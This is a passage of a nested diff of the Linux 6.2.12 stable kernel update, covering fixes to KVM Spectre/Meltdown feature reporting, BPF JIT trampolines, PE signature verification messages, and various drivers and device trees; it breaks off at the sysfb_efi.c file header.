+@@ -337,6 +337,8 @@ tcp_app_win - INTEGER
+ 	Reserve max(window/2^tcp_app_win, mss) of window for application
+ 	buffer. Value 0 is special, it means that nothing is reserved.
+ 
++	Possible values are [0, 31], inclusive.
++
+ 	Default: 31
+ 
+ tcp_autocorking - BOOLEAN
+diff --git a/Documentation/sound/hd-audio/models.rst b/Documentation/sound/hd-audio/models.rst
+index 9b52f50a68542..1204304500147 100644
+--- a/Documentation/sound/hd-audio/models.rst
++++ b/Documentation/sound/hd-audio/models.rst
+@@ -704,7 +704,7 @@ ref
+ no-jd
+     BIOS setup but without jack-detection
+ intel
+-    Intel DG45* mobos
++    Intel D*45* mobos
+ dell-m6-amic
+     Dell desktops/laptops with analog mics
+ dell-m6-dmic
+diff --git a/Makefile b/Makefile
+index 416490daa76ad..068374cc26018 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 11
++SUBLEVEL = 12
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts b/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
+index de2fb1c01b6e3..b82381229adf6 100644
+--- a/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
++++ b/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
+@@ -27,6 +27,16 @@
+ 	};
+ 
+ 	reserved-memory {
++		sbl_region: sbl@2f00000 {
++			reg = <0x02f00000 0x100000>;
++			no-map;
++		};
++
++		external_image_region: external-image@3100000 {
++			reg = <0x03100000 0x200000>;
++			no-map;
++		};
++
+ 		adsp_region: adsp@3300000 {
+ 			reg = <0x03300000 0x1400000>;
+ 			no-map;
+diff --git a/arch/arm/lib/uaccess_with_memcpy.c b/arch/arm/lib/uaccess_with_memcpy.c
+index 14eecaaf295fa..e4c2677cc1e9e 100644
+--- a/arch/arm/lib/uaccess_with_memcpy.c
++++ b/arch/arm/lib/uaccess_with_memcpy.c
+@@ -116,7 +116,7 @@ __copy_to_user_memcpy(void __user *to, const void *from, unsigned long n)
+ 			tocopy = n;
+ 
+ 		ua_flags = uaccess_save_and_enable();
+-		memcpy((void *)to, from, tocopy);
++		__memcpy((void *)to, from, tocopy);
+ 		uaccess_restore(ua_flags);
+ 		to += tocopy;
+ 		from += tocopy;
+@@ -178,7 +178,7 @@ __clear_user_memset(void __user *addr, unsigned long n)
+ 			tocopy = n;
+ 
+ 		ua_flags = uaccess_save_and_enable();
+-		memset((void *)addr, 0, tocopy);
++		__memset((void *)addr, 0, tocopy);
+ 		uaccess_restore(ua_flags);
+ 		addr += tocopy;
+ 		n -= tocopy;
+diff --git a/arch/arm64/boot/dts/qcom/sa8540p-ride.dts b/arch/arm64/boot/dts/qcom/sa8540p-ride.dts
+index 6c547f1b13dc4..0f560a4661eba 100644
+--- a/arch/arm64/boot/dts/qcom/sa8540p-ride.dts
++++ b/arch/arm64/boot/dts/qcom/sa8540p-ride.dts
+@@ -177,7 +177,7 @@
+ };
+ 
+ &remoteproc_nsp0 {
+-	firmware-name = "qcom/sa8540p/cdsp.mbn";
++	firmware-name = "qcom/sa8540p/cdsp0.mbn";
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index 9c5573bc46145..e57f8ae093875 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -1877,9 +1877,33 @@ static int do_pkvm_init(u32 hyp_va_bits)
+ 	return ret;
+ }
+ 
++static u64 get_hyp_id_aa64pfr0_el1(void)
++{
++	/*
++	 * Track whether the system isn't affected by spectre/meltdown in the
++	 * hypervisor's view of id_aa64pfr0_el1, used for protected VMs.
++	 * Although this is per-CPU, we make it global for simplicity, e.g., not
++	 * to have to worry about vcpu migration.
++	 *
++	 * Unlike for non-protected VMs, userspace cannot override this for
++	 * protected VMs.
++	 */
++	u64 val = read_sanitised_ftr_reg(SYS_ID_AA64PFR0_EL1);
++
++	val &= ~(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2) |
++		 ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3));
++
++	val |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2),
++			  arm64_get_spectre_v2_state() == SPECTRE_UNAFFECTED);
++	val |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3),
++			  arm64_get_meltdown_state() == SPECTRE_UNAFFECTED);
++
++	return val;
++}
++
+ static void kvm_hyp_init_symbols(void)
+ {
+-	kvm_nvhe_sym(id_aa64pfr0_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64PFR0_EL1);
++	kvm_nvhe_sym(id_aa64pfr0_el1_sys_val) = get_hyp_id_aa64pfr0_el1();
+ 	kvm_nvhe_sym(id_aa64pfr1_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64PFR1_EL1);
+ 	kvm_nvhe_sym(id_aa64isar0_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64ISAR0_EL1);
+ 	kvm_nvhe_sym(id_aa64isar1_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64ISAR1_EL1);
+diff --git a/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h b/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
+index 07edfc7524c94..37440e1dda930 100644
+--- a/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
++++ b/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
+@@ -33,11 +33,14 @@
+  * Allow for protected VMs:
+  * - Floating-point and Advanced SIMD
+  * - Data Independent Timing
++ * - Spectre/Meltdown Mitigation
+  */
+ #define PVM_ID_AA64PFR0_ALLOW (\
+ 	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_FP) | \
+ 	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_AdvSIMD) | \
+-	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_DIT) \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_DIT) | \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2) | \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3) \
+ 	)
+ 
+ /*
+diff --git a/arch/arm64/kvm/hyp/nvhe/sys_regs.c b/arch/arm64/kvm/hyp/nvhe/sys_regs.c
+index 0f9ac25afdf40..3d5121ee39777 100644
+--- a/arch/arm64/kvm/hyp/nvhe/sys_regs.c
++++ b/arch/arm64/kvm/hyp/nvhe/sys_regs.c
+@@ -84,19 +84,12 @@ static u64 get_restricted_features_unsigned(u64 sys_reg_val,
+ 
+ static u64 get_pvm_id_aa64pfr0(const struct kvm_vcpu *vcpu)
+ {
+-	const struct kvm *kvm = (const struct kvm *)kern_hyp_va(vcpu->kvm);
+ 	u64 set_mask = 0;
+ 	u64 allow_mask = PVM_ID_AA64PFR0_ALLOW;
+ 
+ 	set_mask |= get_restricted_features_unsigned(id_aa64pfr0_el1_sys_val,
+ 		PVM_ID_AA64PFR0_RESTRICT_UNSIGNED);
+ 
+-	/* Spectre and Meltdown mitigation in KVM */
+-	set_mask |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2),
+-			       (u64)kvm->arch.pfr0_csv2);
+-	set_mask |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3),
+-			       (u64)kvm->arch.pfr0_csv3);
+-
+ 	return (id_aa64pfr0_el1_sys_val & allow_mask) | set_mask;
+ }
+ 
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index c243b10f3e150..5eca0cdd961df 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -558,6 +558,7 @@ void kvm_pmu_handle_pmcr(struct kvm_vcpu *vcpu, u64 val)
+ 		for_each_set_bit(i, &mask, 32)
+ 			kvm_pmu_set_pmc_value(kvm_vcpu_idx_to_pmc(vcpu, i), 0, true);
+ 	}
++	kvm_vcpu_pmu_restore_guest(vcpu);
+ }
+ 
+ static bool kvm_pmu_counter_is_enabled(struct kvm_pmc *pmc)
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index c48c053d61466..de966c87e8dea 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -703,7 +703,6 @@ static bool access_pmcr(struct kvm_vcpu *vcpu, struct sys_reg_params *p,
+ 		if (!kvm_supports_32bit_el0())
+ 			val |= ARMV8_PMU_PMCR_LC;
+ 		kvm_pmu_handle_pmcr(vcpu, val);
+-		kvm_vcpu_pmu_restore_guest(vcpu);
+ 	} else {
+ 		/* PMCR.P & PMCR.C are RAZ */
+ 		val = __vcpu_sys_reg(vcpu, PMCR_EL0)
+diff --git a/arch/arm64/net/bpf_jit.h b/arch/arm64/net/bpf_jit.h
+index a6acb94ea3d63..c2edadb8ec6a3 100644
+--- a/arch/arm64/net/bpf_jit.h
++++ b/arch/arm64/net/bpf_jit.h
+@@ -281,4 +281,8 @@
+ /* DMB */
+ #define A64_DMB_ISH aarch64_insn_gen_dmb(AARCH64_INSN_MB_ISH)
+ 
++/* ADR */
++#define A64_ADR(Rd, offset) \
++	aarch64_insn_gen_adr(0, offset, Rd, AARCH64_INSN_ADR_TYPE_ADR)
++
+ #endif /* _BPF_JIT_H */
+diff --git a/arch/arm64/net/bpf_jit_comp.c b/arch/arm64/net/bpf_jit_comp.c
+index 62f805f427b79..b26da8efa616e 100644
+--- a/arch/arm64/net/bpf_jit_comp.c
++++ b/arch/arm64/net/bpf_jit_comp.c
+@@ -1900,7 +1900,8 @@ static int prepare_trampoline(struct jit_ctx *ctx, struct bpf_tramp_image *im,
+ 		restore_args(ctx, args_off, nargs);
+ 		/* call original func */
+ 		emit(A64_LDR64I(A64_R(10), A64_SP, retaddr_off), ctx);
+-		emit(A64_BLR(A64_R(10)), ctx);
++		emit(A64_ADR(A64_LR, AARCH64_INSN_SIZE * 2), ctx);
++		emit(A64_RET(A64_R(10)), ctx);
+ 		/* store return value */
+ 		emit(A64_STR64I(A64_R(0), A64_SP, retval_off), ctx);
+ 		/* reserve a nop for bpf_tramp_image_put */
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index 288003a9f0cae..d586df48ecc64 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -1022,6 +1022,10 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 		emit_atomic(insn, ctx);
+ 		break;
+ 
++	/* Speculation barrier */
++	case BPF_ST | BPF_NOSPEC:
++		break;
++
+ 	default:
+ 		pr_err("bpf_jit: unknown opcode %02x\n", code);
+ 		return -EINVAL;
+diff --git a/arch/powerpc/mm/numa.c b/arch/powerpc/mm/numa.c
+index b44ce71917d75..16cfe56be05bb 100644
+--- a/arch/powerpc/mm/numa.c
++++ b/arch/powerpc/mm/numa.c
+@@ -366,6 +366,7 @@ void update_numa_distance(struct device_node *node)
+ 	WARN(numa_distance_table[nid][nid] == -1,
+ 	     "NUMA distance details for node %d not provided\n", nid);
+ }
++EXPORT_SYMBOL_GPL(update_numa_distance);
+ 
+ /*
+  * ibm,numa-lookup-index-table= {N, domainid1, domainid2, ..... domainidN}
+diff --git a/arch/powerpc/platforms/pseries/papr_scm.c b/arch/powerpc/platforms/pseries/papr_scm.c
+index 2f8385523a132..1a53e048ceb76 100644
+--- a/arch/powerpc/platforms/pseries/papr_scm.c
++++ b/arch/powerpc/platforms/pseries/papr_scm.c
+@@ -1428,6 +1428,13 @@ static int papr_scm_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
++	/*
++	 * open firmware platform device create won't update the NUMA 
++	 * distance table. For PAPR SCM devices we use numa_map_to_online_node()
++	 * to find the nearest online NUMA node and that requires correct
++	 * distance table information.
++	 */
++	update_numa_distance(dn);
+ 
+ 	p = kzalloc(sizeof(*p), GFP_KERNEL);
+ 	if (!p)
+diff --git a/arch/riscv/kernel/signal.c b/arch/riscv/kernel/signal.c
+index bfb2afa4135f8..dee66c9290cce 100644
+--- a/arch/riscv/kernel/signal.c
++++ b/arch/riscv/kernel/signal.c
+@@ -19,6 +19,7 @@
+ #include <asm/signal32.h>
+ #include <asm/switch_to.h>
+ #include <asm/csr.h>
++#include <asm/cacheflush.h>
+ 
+ extern u32 __user_rt_sigreturn[2];
+ 
+@@ -181,6 +182,7 @@ static int setup_rt_frame(struct ksignal *ksig, sigset_t *set,
+ {
+ 	struct rt_sigframe __user *frame;
+ 	long err = 0;
++	unsigned long __maybe_unused addr;
+ 
+ 	frame = get_sigframe(ksig, regs, sizeof(*frame));
+ 	if (!access_ok(frame, sizeof(*frame)))
+@@ -209,7 +211,12 @@ static int setup_rt_frame(struct ksignal *ksig, sigset_t *set,
+ 	if (copy_to_user(&frame->sigreturn_code, __user_rt_sigreturn,
+ 			 sizeof(frame->sigreturn_code)))
+ 		return -EFAULT;
+-	regs->ra = (unsigned long)&frame->sigreturn_code;
++
++	addr = (unsigned long)&frame->sigreturn_code;
++	/* Make sure the two instructions are pushed to icache. */
++	flush_icache_range(addr, addr + sizeof(frame->sigreturn_code));
++
++	regs->ra = addr;
+ #endif /* CONFIG_MMU */
+ 
+ 	/*
+diff --git a/arch/x86/kernel/x86_init.c b/arch/x86/kernel/x86_init.c
+index ef80d361b4632..10622cf2b30f4 100644
+--- a/arch/x86/kernel/x86_init.c
++++ b/arch/x86/kernel/x86_init.c
+@@ -33,8 +33,8 @@ static int __init iommu_init_noop(void) { return 0; }
+ static void iommu_shutdown_noop(void) { }
+ bool __init bool_x86_init_noop(void) { return false; }
+ void x86_op_int_noop(int cpu) { }
+-static __init int set_rtc_noop(const struct timespec64 *now) { return -EINVAL; }
+-static __init void get_rtc_noop(struct timespec64 *now) { }
++static int set_rtc_noop(const struct timespec64 *now) { return -EINVAL; }
++static void get_rtc_noop(struct timespec64 *now) { }
+ 
+ static __initconst const struct of_device_id of_cmos_match[] = {
+ 	{ .compatible = "motorola,mc146818" },
+diff --git a/arch/x86/pci/fixup.c b/arch/x86/pci/fixup.c
+index 615a76d700194..bf5161dcf89e7 100644
+--- a/arch/x86/pci/fixup.c
++++ b/arch/x86/pci/fixup.c
+@@ -7,6 +7,7 @@
+ #include <linux/dmi.h>
+ #include <linux/pci.h>
+ #include <linux/vgaarb.h>
++#include <asm/amd_nb.h>
+ #include <asm/hpet.h>
+ #include <asm/pci_x86.h>
+ 
+@@ -824,3 +825,23 @@ static void rs690_fix_64bit_dma(struct pci_dev *pdev)
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x7910, rs690_fix_64bit_dma);
+ 
+ #endif
++
++#ifdef CONFIG_AMD_NB
++
++#define AMD_15B8_RCC_DEV2_EPF0_STRAP2                                  0x10136008
++#define AMD_15B8_RCC_DEV2_EPF0_STRAP2_NO_SOFT_RESET_DEV2_F0_MASK       0x00000080L
++
++static void quirk_clear_strap_no_soft_reset_dev2_f0(struct pci_dev *dev)
++{
++	u32 data;
++
++	if (!amd_smn_read(0, AMD_15B8_RCC_DEV2_EPF0_STRAP2, &data)) {
++		data &= ~AMD_15B8_RCC_DEV2_EPF0_STRAP2_NO_SOFT_RESET_DEV2_F0_MASK;
++		if (amd_smn_write(0, AMD_15B8_RCC_DEV2_EPF0_STRAP2, data))
++			pci_err(dev, "Failed to write data 0x%x\n", data);
++	} else {
++		pci_err(dev, "Failed to read data\n");
++	}
++}
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_AMD, 0x15b8, quirk_clear_strap_no_soft_reset_dev2_f0);
++#endif
+diff --git a/crypto/asymmetric_keys/pkcs7_verify.c b/crypto/asymmetric_keys/pkcs7_verify.c
+index f6321c785714c..3da32813e4412 100644
+--- a/crypto/asymmetric_keys/pkcs7_verify.c
++++ b/crypto/asymmetric_keys/pkcs7_verify.c
+@@ -79,16 +79,16 @@ static int pkcs7_digest(struct pkcs7_message *pkcs7,
+ 		}
+ 
+ 		if (sinfo->msgdigest_len != sig->digest_size) {
+-			pr_debug("Sig %u: Invalid digest size (%u)\n",
+-				 sinfo->index, sinfo->msgdigest_len);
++			pr_warn("Sig %u: Invalid digest size (%u)\n",
++				sinfo->index, sinfo->msgdigest_len);
+ 			ret = -EBADMSG;
+ 			goto error;
+ 		}
+ 
+ 		if (memcmp(sig->digest, sinfo->msgdigest,
+ 			   sinfo->msgdigest_len) != 0) {
+-			pr_debug("Sig %u: Message digest doesn't match\n",
+-				 sinfo->index);
++			pr_warn("Sig %u: Message digest doesn't match\n",
++				sinfo->index);
+ 			ret = -EKEYREJECTED;
+ 			goto error;
+ 		}
+@@ -478,7 +478,7 @@ int pkcs7_supply_detached_data(struct pkcs7_message *pkcs7,
+ 			       const void *data, size_t datalen)
+ {
+ 	if (pkcs7->data) {
+-		pr_debug("Data already supplied\n");
++		pr_warn("Data already supplied\n");
+ 		return -EINVAL;
+ 	}
+ 	pkcs7->data = data;
+diff --git a/crypto/asymmetric_keys/verify_pefile.c b/crypto/asymmetric_keys/verify_pefile.c
+index 7553ab18db898..22beaf2213a22 100644
+--- a/crypto/asymmetric_keys/verify_pefile.c
++++ b/crypto/asymmetric_keys/verify_pefile.c
+@@ -74,7 +74,7 @@ static int pefile_parse_binary(const void *pebuf, unsigned int pelen,
+ 		break;
+ 
+ 	default:
+-		pr_debug("Unknown PEOPT magic = %04hx\n", pe32->magic);
++		pr_warn("Unknown PEOPT magic = %04hx\n", pe32->magic);
+ 		return -ELIBBAD;
+ 	}
+ 
+@@ -95,7 +95,7 @@ static int pefile_parse_binary(const void *pebuf, unsigned int pelen,
+ 	ctx->certs_size = ddir->certs.size;
+ 
+ 	if (!ddir->certs.virtual_address || !ddir->certs.size) {
+-		pr_debug("Unsigned PE binary\n");
++		pr_warn("Unsigned PE binary\n");
+ 		return -ENODATA;
+ 	}
+ 
+@@ -127,7 +127,7 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	unsigned len;
+ 
+ 	if (ctx->sig_len < sizeof(wrapper)) {
+-		pr_debug("Signature wrapper too short\n");
++		pr_warn("Signature wrapper too short\n");
+ 		return -ELIBBAD;
+ 	}
+ 
+@@ -135,19 +135,23 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	pr_debug("sig wrapper = { %x, %x, %x }\n",
+ 		 wrapper.length, wrapper.revision, wrapper.cert_type);
+ 
+-	/* Both pesign and sbsign round up the length of certificate table
+-	 * (in optional header data directories) to 8 byte alignment.
++	/* sbsign rounds up the length of certificate table (in optional
++	 * header data directories) to 8 byte alignment.  However, the PE
++	 * specification states that while entries are 8-byte aligned, this is
++	 * not included in their length, and as a result, pesign has not
++	 * rounded up since 0.110.
+ 	 */
+-	if (round_up(wrapper.length, 8) != ctx->sig_len) {
+-		pr_debug("Signature wrapper len wrong\n");
++	if (wrapper.length > ctx->sig_len) {
++		pr_warn("Signature wrapper bigger than sig len (%x > %x)\n",
++			ctx->sig_len, wrapper.length);
+ 		return -ELIBBAD;
+ 	}
+ 	if (wrapper.revision != WIN_CERT_REVISION_2_0) {
+-		pr_debug("Signature is not revision 2.0\n");
++		pr_warn("Signature is not revision 2.0\n");
+ 		return -ENOTSUPP;
+ 	}
+ 	if (wrapper.cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA) {
+-		pr_debug("Signature certificate type is not PKCS\n");
++		pr_warn("Signature certificate type is not PKCS\n");
+ 		return -ENOTSUPP;
+ 	}
+ 
+@@ -160,7 +164,7 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	ctx->sig_offset += sizeof(wrapper);
+ 	ctx->sig_len -= sizeof(wrapper);
+ 	if (ctx->sig_len < 4) {
+-		pr_debug("Signature data missing\n");
++		pr_warn("Signature data missing\n");
+ 		return -EKEYREJECTED;
+ 	}
+ 
+@@ -194,7 +198,7 @@ check_len:
+ 		return 0;
+ 	}
+ not_pkcs7:
+-	pr_debug("Signature data not PKCS#7\n");
++	pr_warn("Signature data not PKCS#7\n");
+ 	return -ELIBBAD;
+ }
+ 
+@@ -337,8 +341,8 @@ static int pefile_digest_pe(const void *pebuf, unsigned int pelen,
+ 	digest_size = crypto_shash_digestsize(tfm);
+ 
+ 	if (digest_size != ctx->digest_len) {
+-		pr_debug("Digest size mismatch (%zx != %x)\n",
+-			 digest_size, ctx->digest_len);
++		pr_warn("Digest size mismatch (%zx != %x)\n",
++			digest_size, ctx->digest_len);
+ 		ret = -EBADMSG;
+ 		goto error_no_desc;
+ 	}
+@@ -369,7 +373,7 @@ static int pefile_digest_pe(const void *pebuf, unsigned int pelen,
+ 	 * PKCS#7 certificate.
+ 	 */
+ 	if (memcmp(digest, ctx->digest, ctx->digest_len) != 0) {
+-		pr_debug("Digest mismatch\n");
++		pr_warn("Digest mismatch\n");
+ 		ret = -EKEYREJECTED;
+ 	} else {
+ 		pr_debug("The digests match!\n");
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index a222bda7e15b0..d08818baea88f 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -400,6 +400,13 @@ static const struct dmi_system_id medion_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "M17T"),
+ 		},
+ 	},
++	{
++		.ident = "MEDION S17413",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "MEDION"),
++			DMI_MATCH(DMI_BOARD_NAME, "M1xA"),
++		},
++	},
+ 	{ }
+ };
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index b3b0b06971df5..e85729fc481fd 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -532,6 +532,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Precision 7510"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Acer Aspire 3830TG */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Aspire 3830TG"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Acer Aspire 4810T */
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 2ed994a313a91..c0cbc5f3eb266 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1571,17 +1571,18 @@ static int ublk_ctrl_start_dev(struct io_uring_cmd *cmd)
+ 		set_bit(GD_SUPPRESS_PART_SCAN, &disk->state);
+ 
+ 	get_device(&ub->cdev_dev);
++	ub->dev_info.state = UBLK_S_DEV_LIVE;
+ 	ret = add_disk(disk);
+ 	if (ret) {
+ 		/*
+ 		 * Has to drop the reference since ->free_disk won't be
+ 		 * called in case of add_disk failure.
+ 		 */
++		ub->dev_info.state = UBLK_S_DEV_DEAD;
+ 		ublk_put_device(ub);
+ 		goto out_put_disk;
+ 	}
+ 	set_bit(UB_STATE_USED, &ub->state);
+-	ub->dev_info.state = UBLK_S_DEV_LIVE;
+ out_put_disk:
+ 	if (ret)
+ 		put_disk(disk);
+diff --git a/drivers/bluetooth/btbcm.c b/drivers/bluetooth/btbcm.c
+index 3006e2a0f37e1..43e98a598bd9a 100644
+--- a/drivers/bluetooth/btbcm.c
++++ b/drivers/bluetooth/btbcm.c
+@@ -511,7 +511,7 @@ static const char *btbcm_get_board_name(struct device *dev)
+ 	len = strlen(tmp) + 1;
+ 	board_type = devm_kzalloc(dev, len, GFP_KERNEL);
+ 	strscpy(board_type, tmp, len);
+-	for (i = 0; i < board_type[i]; i++) {
++	for (i = 0; i < len; i++) {
+ 		if (board_type[i] == '/')
+ 			board_type[i] = '-';
+ 	}
+diff --git a/drivers/clk/clk-renesas-pcie.c b/drivers/clk/clk-renesas-pcie.c
+index e6247141d0c05..3e98a16eba6bb 100644
+--- a/drivers/clk/clk-renesas-pcie.c
++++ b/drivers/clk/clk-renesas-pcie.c
+@@ -144,8 +144,9 @@ static int rs9_regmap_i2c_read(void *context,
+ static const struct regmap_config rs9_regmap_config = {
+ 	.reg_bits = 8,
+ 	.val_bits = 8,
+-	.cache_type = REGCACHE_NONE,
++	.cache_type = REGCACHE_FLAT,
+ 	.max_register = RS9_REG_BCP,
++	.num_reg_defaults_raw = 0x8,
+ 	.rd_table = &rs9_readable_table,
+ 	.wr_table = &rs9_writeable_table,
+ 	.reg_write = rs9_regmap_i2c_write,
+diff --git a/drivers/clk/sprd/common.c b/drivers/clk/sprd/common.c
+index ce81e4087a8fc..2bfbab8db94bf 100644
+--- a/drivers/clk/sprd/common.c
++++ b/drivers/clk/sprd/common.c
+@@ -17,7 +17,6 @@ static const struct regmap_config sprdclk_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0xffff,
+ 	.fast_io	= true,
+ };
+ 
+@@ -43,6 +42,8 @@ int sprd_clk_regmap_init(struct platform_device *pdev,
+ 	struct device *dev = &pdev->dev;
+ 	struct device_node *node = dev->of_node, *np;
+ 	struct regmap *regmap;
++	struct resource *res;
++	struct regmap_config reg_config = sprdclk_regmap_config;
+ 
+ 	if (of_find_property(node, "sprd,syscon", NULL)) {
+ 		regmap = syscon_regmap_lookup_by_phandle(node, "sprd,syscon");
+@@ -59,12 +60,14 @@ int sprd_clk_regmap_init(struct platform_device *pdev,
+ 			return PTR_ERR(regmap);
+ 		}
+ 	} else {
+-		base = devm_platform_ioremap_resource(pdev, 0);
++		base = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 		if (IS_ERR(base))
+ 			return PTR_ERR(base);
+ 
++		reg_config.max_register = resource_size(res) - reg_config.reg_stride;
++
+ 		regmap = devm_regmap_init_mmio(&pdev->dev, base,
+-					       &sprdclk_regmap_config);
++					       &reg_config);
+ 		if (IS_ERR(regmap)) {
+ 			pr_err("failed to init regmap\n");
+ 			return PTR_ERR(regmap);
+diff --git a/drivers/dma/apple-admac.c b/drivers/dma/apple-admac.c
+index 90f28bda29c8b..4cf8da77bdd91 100644
+--- a/drivers/dma/apple-admac.c
++++ b/drivers/dma/apple-admac.c
+@@ -75,6 +75,7 @@
+ 
+ #define REG_TX_INTSTATE(idx)		(0x0030 + (idx) * 4)
+ #define REG_RX_INTSTATE(idx)		(0x0040 + (idx) * 4)
++#define REG_GLOBAL_INTSTATE(idx)	(0x0050 + (idx) * 4)
+ #define REG_CHAN_INTSTATUS(ch, idx)	(0x8010 + (ch) * 0x200 + (idx) * 4)
+ #define REG_CHAN_INTMASK(ch, idx)	(0x8020 + (ch) * 0x200 + (idx) * 4)
+ 
+@@ -511,7 +512,10 @@ static int admac_terminate_all(struct dma_chan *chan)
+ 	admac_stop_chan(adchan);
+ 	admac_reset_rings(adchan);
+ 
+-	adchan->current_tx = NULL;
++	if (adchan->current_tx) {
++		list_add_tail(&adchan->current_tx->node, &adchan->to_free);
++		adchan->current_tx = NULL;
++	}
+ 	/*
+ 	 * Descriptors can only be freed after the tasklet
+ 	 * has been killed (in admac_synchronize).
+@@ -672,13 +676,14 @@ static void admac_handle_chan_int(struct admac_data *ad, int no)
+ static irqreturn_t admac_interrupt(int irq, void *devid)
+ {
+ 	struct admac_data *ad = devid;
+-	u32 rx_intstate, tx_intstate;
++	u32 rx_intstate, tx_intstate, global_intstate;
+ 	int i;
+ 
+ 	rx_intstate = readl_relaxed(ad->base + REG_RX_INTSTATE(ad->irq_index));
+ 	tx_intstate = readl_relaxed(ad->base + REG_TX_INTSTATE(ad->irq_index));
++	global_intstate = readl_relaxed(ad->base + REG_GLOBAL_INTSTATE(ad->irq_index));
+ 
+-	if (!tx_intstate && !rx_intstate)
++	if (!tx_intstate && !rx_intstate && !global_intstate)
+ 		return IRQ_NONE;
+ 
+ 	for (i = 0; i < ad->nchannels; i += 2) {
+@@ -693,6 +698,12 @@ static irqreturn_t admac_interrupt(int irq, void *devid)
+ 		rx_intstate >>= 1;
+ 	}
+ 
++	if (global_intstate) {
++		dev_warn(ad->dev, "clearing unknown global interrupt flag: %x\n",
++			 global_intstate);
++		writel_relaxed(~(u32) 0, ad->base + REG_GLOBAL_INTSTATE(ad->irq_index));
++	}
++
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -850,6 +861,9 @@ static int admac_probe(struct platform_device *pdev)
+ 
+ 	dma->directions = BIT(DMA_MEM_TO_DEV) | BIT(DMA_DEV_TO_MEM);
+ 	dma->residue_granularity = DMA_RESIDUE_GRANULARITY_BURST;
++	dma->src_addr_widths = BIT(DMA_SLAVE_BUSWIDTH_1_BYTE) |
++			BIT(DMA_SLAVE_BUSWIDTH_2_BYTES) |
++			BIT(DMA_SLAVE_BUSWIDTH_4_BYTES);
+ 	dma->dst_addr_widths = BIT(DMA_SLAVE_BUSWIDTH_1_BYTE) |
+ 			BIT(DMA_SLAVE_BUSWIDTH_2_BYTES) |
+ 			BIT(DMA_SLAVE_BUSWIDTH_4_BYTES);
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index e76d6803bdd08..456d0e5eaf78b 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
